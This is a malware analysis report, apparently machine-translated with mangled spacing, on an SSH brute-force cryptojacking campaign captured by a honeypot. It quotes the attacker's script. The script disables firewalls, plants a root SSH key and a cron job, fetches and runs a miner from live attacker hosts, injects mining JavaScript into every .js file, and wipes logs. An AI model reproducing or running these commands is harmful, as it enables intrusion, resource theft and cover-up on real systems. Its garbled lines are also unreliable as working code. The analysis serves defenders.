Preface
Digital currency has gradually become the focus of public attention because of its technological decentralization and economic value. At the same time, it is an important way for the black and gray industries to obtain profits through malicious mining. This article analyzes the xmr malicious mining events obtained through a honeypot: attackers obtain system permissions through brute force SSH, configure root user password-free logon, and download and execute xmr mining programs and xmr web page mining programs. The xmr mining program consumes zombie CPU/GPU resources, and the webpage mining program consumes client resources to access the JS webpage of the zombie server.
On July 6, October 11, 2018, an attacker used a malicious IP address (223.89.72.8) to crack the victim SSH service and obtained SYSTEM account privileges.
2) Disable victim's firewall
Log on to the victim account obtained through brute-force cracking, enter the working directory/tmp, and try to disable the host firewall.
[email protected]:~#cd/tmp
[email protected]:~#/etc/init.d/iptablesstop
[email protected]:~#serviceiptablesstop
[email protected]:~#SuSefirewall2stop
[email protected]:~#reSuSefirewall2stop
3) download malicious scripts
Command victim to download the malicious file sHz. Sh from malware server (140.143.35.89: 43768:
[email protected]:/tmp#wgethttp://140.143.35.89:43768/shz.sh
[4l--2018-10-1119:07:34--http://140.143.35.89:43768/shz.sh
Connectingto140.143.35.89:43768...connected.
HTTPrequestsent,awaitingresponse...200OK
Length:7470(7K)[application/octet-stream]
Savingto:`/tmp/shz.sh‘
58%[======================>]4,38041K/seta0s
100%[======================================>]7,47041K/s
2018-10-**:*:*(41KB/s)-`/tmp/shz.sh‘saved[7470/7470]
Ii. execute malicious scripts
After obtaining the victim bot permissions and downloading malicious scripts, run the command victim to execute/tmp/sHz. Sh. The following describes the malicious behavior of sHz. Sh.
1) start execution[email protected]:/tmp#shshz.sh&
2) basic configuration
Obtain the regular crontab task file and content of victim, the Public Key for SSH logon, and modify the basic configurations such as the downloaded file command and variable definition.
#! /Bin/sh
# Crontab scheduled task (crontab-E)
Crondir = '/var/spool/cron/' "$ user"
Cont = 'cat $ {crondir }'
# SSH logon Public Key
Ssht = 'cat/root/. Ssh/authorized_keys'
# Custom Variables
Echo1>/etc/gmbpr
Rtdir = "/etc/gmbpr"
Bbdir = "/usr/bin/curl"
Bbdira = "/usr/bin/url"
Ccdir = "/usr/bin/wget"
Ccdira = "/usr/bin/get"
# Change command name
MV/usr/bin/wget/usr/bin/get
MV/usr/bin/curl/usr/bin/URL
3) Determine account permissions (special permissions)
If the file/etc/gmbpr exists, the account that is cracked by brute force has the/etc write permission, generally root. Set the working directory to/etc:
if[-f"$rtdir"]
3.1 scheduled task + password-free Logon
# Add the malicious script/etc/sHz. Sh to the crontab scheduled task.
[[$ Cont = ~ "SHz. Sh"] | echo "***** sh/etc/sHz. Sh>/dev/null2> & 1" >$ {crondir}
# Add the attacker's SSH logon public key to authorized_key for password-less SSH Logon
[[$ Ssht = ~ "Xvsrtqhlmwoh"] | echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/zkbe2ijeamhqlezpe4vprfi
Paygo8cf8tn9dcpqxh9iv5/vyebadxevixktvsjpwny/assets/xpzen4ggl + kN + 7 ggxvsrtqh
Authorization + 1dzd36a8ijjcjarutyjnrzdkp8t3hiew0ubadhiu3 + ku641kw9bfr9kg7vzgrvrf7lvzon6o8ybq
[Email protected] _ me ">/root/. Ssh/authorized_keys
3.2 configuration file for malicious Mining
If the configuration file/etc/COM. JSON does not exist, download it from http: // 140.143.35.89: 43768/COM. JSON to/etc/COM. JSON.
cfg="/etc/com.json"
if[-f"$cfg"]
then
echo"existsconfig"
else
if[-f"$bbdir"]
then
curl--connect-timeout10--retry100http://140.143.35.89:43768/com.json>/et
c/com.json
elif[-f"$bbdira"]
/com.json
elif[-f"$ccdir"]
wget--timeout=10--tries=100-P/etchttp://140.143.35.89:43768/com.json
fi
fi
3.3 elf main mining program
Download the malicious mining main program zjgw from the http://zjgw-1256891197.cos.ap-beijing.myqcloud.com to/etc. Zjgw is a binary file in ELF format.
if[-f"$bbdir"]
curl--connect-timeout10--retry100http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zjgw>/etc/zjgw
elif[-f"$bbdira"]
url--connect-timeout10--retry100http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zjgw>/etc/zjgw
elif[-f"$ccdir"]
wget--timeout=10--tries=100-P/etchttp://dwz.cn/hqCK3WKx
fi
3.4 run the malicious mining program
The mining program zjgw + configuration file com. JSON:
Chmod777zjgw
# Replace unknow with the character $ {IP} in the com. JSON configuration file}
Sed-I "s/unknow/$ {IP}/g" com. JSON
Sleep5s
# Execute the mining program
./Zjgw -- Config = com. JSON
# Clear command log traces
History-C
Echo>/root/. bash_history
3.5 download and run the sHz. Sh script file.
shdir=‘/etc/shz.sh‘
if[-f"$shdir"]
echo"existsshell"
curl--connect-timeout10--retry100http://140.143.35.89:43768/shz.sh>/etc/shz.sh
wget--timeout=10--tries=100-P/etchttp://140.143.35.89:43768/shz.sh
sh/etc/shz.sh
fi
4) Determine account permissions (General permissions)
If the file/etc/gmbpr does not exist, the brute-force cracking account is the normal user permission. Add the startup script to the crontab scheduled task. Set the working directory to/tmp:
4.1) download the configuration file com. JSON to/tmp
4.2) download the main mining program zjgw to/tmp
4.3) run the malicious mining program + configuration file (same as 3.4)
4.4) download and run the malicious script/tmp/sHz. Sh (same as 3.5)
5) monero JavaScript Web Mining
Search for the JS file in victim and insert the JS script document for mining on the webpage. write ('<SCRIPT src = "http://t.cn/evlonfh"> </SCRIPT> <SCRIPT> omineid (" e02cf4ce91284dab9bc3fc4cc2a65e28 ","-1 ") </SCRIPT> ');
find/-name‘*.js‘|xargsgrep-Lf4ce9|xargssed-i‘$a\document.write\(‘\‘\<script\src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\
>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\‘\)\;
6) Clear traces
Attackers can clear attack log traces.
echo>/var/spool/mail/root
echo>/var/log/wtmp
echo>/var/log/secure
3. Execute the elf mining program 1) Mining Configuration File com. JSON
The xmr digital currency mining algorithm, mining address, and wallet address are displayed in the configuration file:
{
# Xmr Monroe coin's main consensus mechanism (Mining Algorithm): cryptonight
"algo":"cryptonight",
"api":{
"port":0,
"access-token":null,
"worker-id":null,
"ipv6":false,
"restricted":true
},
"av":0,
"background":true,
"colors":true,
"cpu-priority":5,
"donate-level":1,
"log-file":null,
"max-cpu-usage":90,
"pools":[
{
# Mining address
"url":"stratum+tcp://xmr.f2pool.com:13531",
# Wallet address
"user":
"46j2hc8eJbZZST8L4cpmLdjKKvWnggQVt9HRLYHsCKHUZbuok15X93ag9djxnt2mdpdJPRCsvuHzm92iahdpBxZa3FbBovX.unknow",
"pass":"x",
"keepalive":true,
"nicehash":false,
"variant":-1
],
"print-time":60,
"retries":99999,
"retry-pause":5,
"safe":false,
"syslog":false,
}
2) The main mining program zjgw
Zjgw is a 64-bit ELF binary file. The virustal detection function includes the mining function.
As of now, attackers have used the f2pool for malicious elf programs. The above wallet address-related benefits are as follows:
(1) 164 miners are mining on line;
(2) A total of 254 miners were captured;
(3) the total profit of this wallet address is 4.7xmr, which is calculated based on the current market price of 736rmb, and the gain is about 3459rmb.
(4) many of these miners may be bots captured by attackers. Attackers may also benefit from other wallet addresses and zombie miners.
Short URL pointing to https://xmr.omine.org/assets/v7.js
HTTP/1.1302Found
Date:Mon,15Oct201808:02:12GMT
Content-Type:text/html;charset=UTF-8
Content-Length:216
Connection:keep-alive
Set-Cookie:aliyungf_tc=AQAAAN65sGSyOQcAihDut35iYAxQi2Sj;Path=/;HttpOnly
Server:nginx
Location:https://xmr.omine.org/assets/v7.js
2) curl https://xmr.omine.org/assets/v7.js
Javascript script file, which contains the mining pool address WSS: // xmr.ominie.org: 8181:
Assuming that the attacker's Js web page mining and ELF Program Mining use the same wallet mining, the benefits here are relatively small, with 0.037 xmr.
After attackers obtain system accounts through SSH brute-force cracking, on the one hand, they download and run the ELF binary mining program and use the system CPU/GPU resources for xmr (Monroe coin) mining. On the other hand, by inserting JS webpage mining code in the system's JS file, xmr webpage mining is performed by remotely accessing the client resources of the system's Js webpage. Recommended measures:
Http://3g.163.com/dy/article/DUIH9G5O05119F6V.html
(1) account reinforcement;
(2) system resource, network, and process monitoring;
(3) check whether the system has malicious resource abuse (ELF mining program );
(4) check whether the system has a malicious JS web page mining script (web page mining script );
(5) Others
Analysis of xmr malicious mining Cases